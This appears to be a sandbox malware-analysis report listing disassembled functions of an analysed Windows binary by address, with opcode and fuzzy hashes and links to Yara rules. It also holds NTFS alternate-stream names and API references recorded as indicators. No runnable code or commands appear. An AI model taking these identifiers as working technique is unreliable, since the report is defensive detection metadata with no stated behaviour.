Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 49e9b622a0bfff4a584b6ce6135862a2cc150116dd83739bda1dc6aafe13e0e1
Instruction ID: 260d4d2a60c126822425aafdda61d4e4c4d31b9dfca2ff5c499ece0459bd3673
Opcode Fuzzy Hash: 49e9b622a0bfff4a584b6ce6135862a2cc150116dd83739bda1dc6aafe13e0e1
Instruction Fuzzy Hash: C7B09224E17A02D2EB087B116C82294A3A4BF48B00FE68038C20C81320DE7C20A56720

Function 00007FF731C938E4 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54290223a8ba79ed3aaf6a2d06b73af4b6e964142a0269ccd27502c3eedc10fa
Instruction ID: 53836c97013bb9461dcf3ddd3a5cd59b1397db852ca121b931fd360dff0656fc
Opcode Fuzzy Hash: 54290223a8ba79ed3aaf6a2d06b73af4b6e964142a0269ccd27502c3eedc10fa
Instruction Fuzzy Hash: B88201A2E096C196D715DF28D4042FCBBA1E755B88F69813ACF8E07785EA7CD845E320

Function 00007FF731C776C0 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction ID: 3390a26094e7a4e1912b350f305f91386d9b9f56c005e8aca9b5f03d8128826b
Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction Fuzzy Hash: BF627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF731C95370 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4efc32286d2aa1a25cc5ffd7cc7e5718d6ef71f83821984f4622f4296158de
Instruction ID: a2ba660e6d52fb36f38f7b912475451f234687b835e3bbbf426c884bf08cd520
Opcode Fuzzy Hash: 3c4efc32286d2aa1a25cc5ffd7cc7e5718d6ef71f83821984f4622f4296158de
Instruction Fuzzy Hash: F9822FB3E096C09AD714DF28C0446FCBBA1F755B48F698236CA4D47786EA7CD886D720

Function 00007FF731C8BB4C Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e191559d85294972c8b15a22cf3b400ae880c7d5fcdb58d6052d2ea93da585ac
Instruction ID: 7d2a04c2ec554c0d3af12830eeb224505bccb16b498a167b75b64674ff632bac
Opcode Fuzzy Hash: e191559d85294972c8b15a22cf3b400ae880c7d5fcdb58d6052d2ea93da585ac
Instruction Fuzzy Hash: 5922F573B246508BD728CF25C89AE5E3766F798744B4B9228DF0ACB785DB38D505CB40

Function 00007FF731C94B18 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f657be7e1f195e1cb0a077a2e8992a9c2316c08defb54c66119332128546ffa
Instruction ID: 03b921e9cbf05f79fcf86e66f04fdbbfdba9c9704c454883ee359067f1033b2b
Opcode Fuzzy Hash: 1f657be7e1f195e1cb0a077a2e8992a9c2316c08defb54c66119332128546ffa
Instruction Fuzzy Hash: 12321073E085819BE31CDF28D550ABCB7A1F754B08F65813ADA4A87B89EB3CE850D750

Function 00007FF731C91EA0 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50353d2a1e0d5bdd6f7fb1c77c3678e4e506cc91c211ce2d60fa6b56f074af31
Instruction ID: a4f2b6b7bba82b11a12575f92ef778cf11265482da3be5f7faec54eab1ba7e7d
Opcode Fuzzy Hash: 50353d2a1e0d5bdd6f7fb1c77c3678e4e506cc91c211ce2d60fa6b56f074af31
Instruction Fuzzy Hash: D7E14732E082C29BEB60EF29A1442BDB790FB44748FA55135DB4E8BB85EE7CE441D714

Function 00007FF731C93404 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
Instruction ID: 0d804e99a19849773ed2ddb442e70f7fb56d51495c4968ffeb128d61c4c01694
Opcode Fuzzy Hash: b080e87118f04f16fc44de2e1f07be042694fa9f1456133e620114afb5815e81
Instruction Fuzzy Hash: DAB1EFA2B04BC9A2DF18EA66D6087E9A391B744FC4F989036DE1D0B740EFBCE555D310

Function 00007FF731C77288 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
Instruction ID: bd7808e52bc9d66d146ec5d5b09db7bc5c81a253ad1aa83ed45eb5914fb32eef
Opcode Fuzzy Hash: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
Instruction Fuzzy Hash: 22C1ABB7B282908FE350CF7AE400A9D7BB1F39878CB519125DF59A3B09D679E605CB40

Function 00007FF731C92CD8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
Instruction ID: 1883575c490f32bd7fe27492f40de7f3da15bf6027bc09a097d8adb74d75cd23
Opcode Fuzzy Hash: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
Instruction Fuzzy Hash: 45A1A873E0819262EB51FA24D4447FDF791EB98744FA54134DA8E07B82EEBCE841E360

Function 00007FF731C8AED4 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
Instruction ID: 6384670ec921cfa9822c1022b2a7a687f0dafaf09253a9bcebbc9a8ac67e526f
Opcode Fuzzy Hash: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
Instruction Fuzzy Hash: 25C1F673E291E04DE302CBB5A4648FD3FF1E71E34DB4A4152EFA656B4AD5289201DF60

Function 00007FF731C7A2FC Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
Instruction ID: ba0eeacf90d7fd4a336f3c398818747d40cfb4e40e4eafcfafa23dc6d4c32729
Opcode Fuzzy Hash: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
Instruction Fuzzy Hash: 6B913462F18581A6EB11EF29D4503FDA760FF95B88F942031EF4E07A49EEB9D646C310

Function 00007FF731C7A664 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
Instruction ID: 3453c83d74e4d900342d19fc0874e22bd914637c66ed0aa70b07813758b8215c
Opcode Fuzzy Hash: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
Instruction Fuzzy Hash: 93814623F18691A5EB10EB26D8407EEE7A4FB84788F941032DE4D07B99DFB9D905D710

Function 00007FF731C8B4F0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
Instruction ID: e6c0188340a55ac76d9039abbb4aae523d93b3c9d9a20e4af54a824e6468a055
Opcode Fuzzy Hash: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
Instruction Fuzzy Hash: D5615623F181D569EB01DF7485405FEBFB1E709788B994032CEAA63A46DA7CE105EB30

Function 00007FF731C92150 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
Instruction ID: 006be273ca1370a1e5c901c74f66573222166f298a790cc9c877b888bb14853b
Opcode Fuzzy Hash: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
Instruction Fuzzy Hash: 90518673F184515BE3589F28D4087BCB351F788B58FA44230CB8947A88EE7DE901EB10

Function 00007FF731C92A30 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
Instruction ID: 7b594f364a2753e93ec19dd4f648d2a3b8b298c31d0df3f452051a78b2da4e43
Opcode Fuzzy Hash: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
Instruction Fuzzy Hash: 8B3128B2E085816BD758EE16D9913BEB7D0F744784F508038DB8683F41DA7CE445D710

Function 00007FF731CB5860 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c301e110b5bfde31e548f7e504ad4167112c0d1c37f03b0bb4904797d209faef
Instruction ID: e765c265e309c75cc48315b1e4a3088021ccaf01c19ecb8a63eab5666d41adf0
Opcode Fuzzy Hash: c301e110b5bfde31e548f7e504ad4167112c0d1c37f03b0bb4904797d209faef
Instruction Fuzzy Hash: 48F06272B186959BDBA4EF29A842629B7D0F708380F958039DA8D83B04D67C90609F14

Function 00007FF731CA32D4 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
Instruction ID: 36349dce48f73e37fdc52275a65dccb285bae4f25b0c20f8730d3648c5457991
Opcode Fuzzy Hash: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
Instruction Fuzzy Hash: 50A00161D09842E0E745AB40A8A1060A320BB50B00BA09531E40D810A5DEACA810E260

Function 00007FF731C7D7E0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D974

Strings

::$FILE_NAME, xrefs: 00007FF731C7D843
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF731C7D859
::$INDEX_ROOT, xrefs: 00007FF731C7D864
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF731C7D87A
::$BITMAP, xrefs: 00007FF731C7D817
::$OBJECT_ID, xrefs: 00007FF731C7D890
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF731C7D885
::$INDEX_ALLOCATION, xrefs: 00007FF731C7D84E
::$EA_INFORMATION, xrefs: 00007FF731C7D838
::$EA, xrefs: 00007FF731C7D82D
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF731C7D86F
::$REPARSE_POINT, xrefs: 00007FF731C7D89B
::$ATTRIBUTE_LIST, xrefs: 00007FF731C7D80C
::$DATA, xrefs: 00007FF731C7D822

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: df969facf24a54bd4a4c61cb6c3becc837b8ce778cf416acdee48feaf039601d
Instruction ID: 7f9ada277f98a63cdaab47c2cfc249e997f00f41c3f9a309e38886a858e062cb
Opcode Fuzzy Hash: df969facf24a54bd4a4c61cb6c3becc837b8ce778cf416acdee48feaf039601d
Instruction Fuzzy Hash: D1410876F05B01A9EB00EF60E8403E973A5FB48794FA04536DA4C43B59EEB8D155D354

Function 00007FF731CA2990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF731CA29A6
GetModuleHandleW.KERNEL32 ref: 00007FF731CA29B3
GetModuleHandleW.KERNEL32 ref: 00007FF731CA29C8
GetProcAddress.KERNEL32 ref: 00007FF731CA29E0
GetProcAddress.KERNEL32 ref: 00007FF731CA29F3
CreateEventW.KERNEL32 ref: 00007FF731CA2A1F
DeleteCriticalSection.KERNEL32 ref: 00007FF731CA2A6B
CloseHandle.KERNEL32 ref: 00007FF731CA2A7D

Strings

WakeAllConditionVariable, xrefs: 00007FF731CA29E6
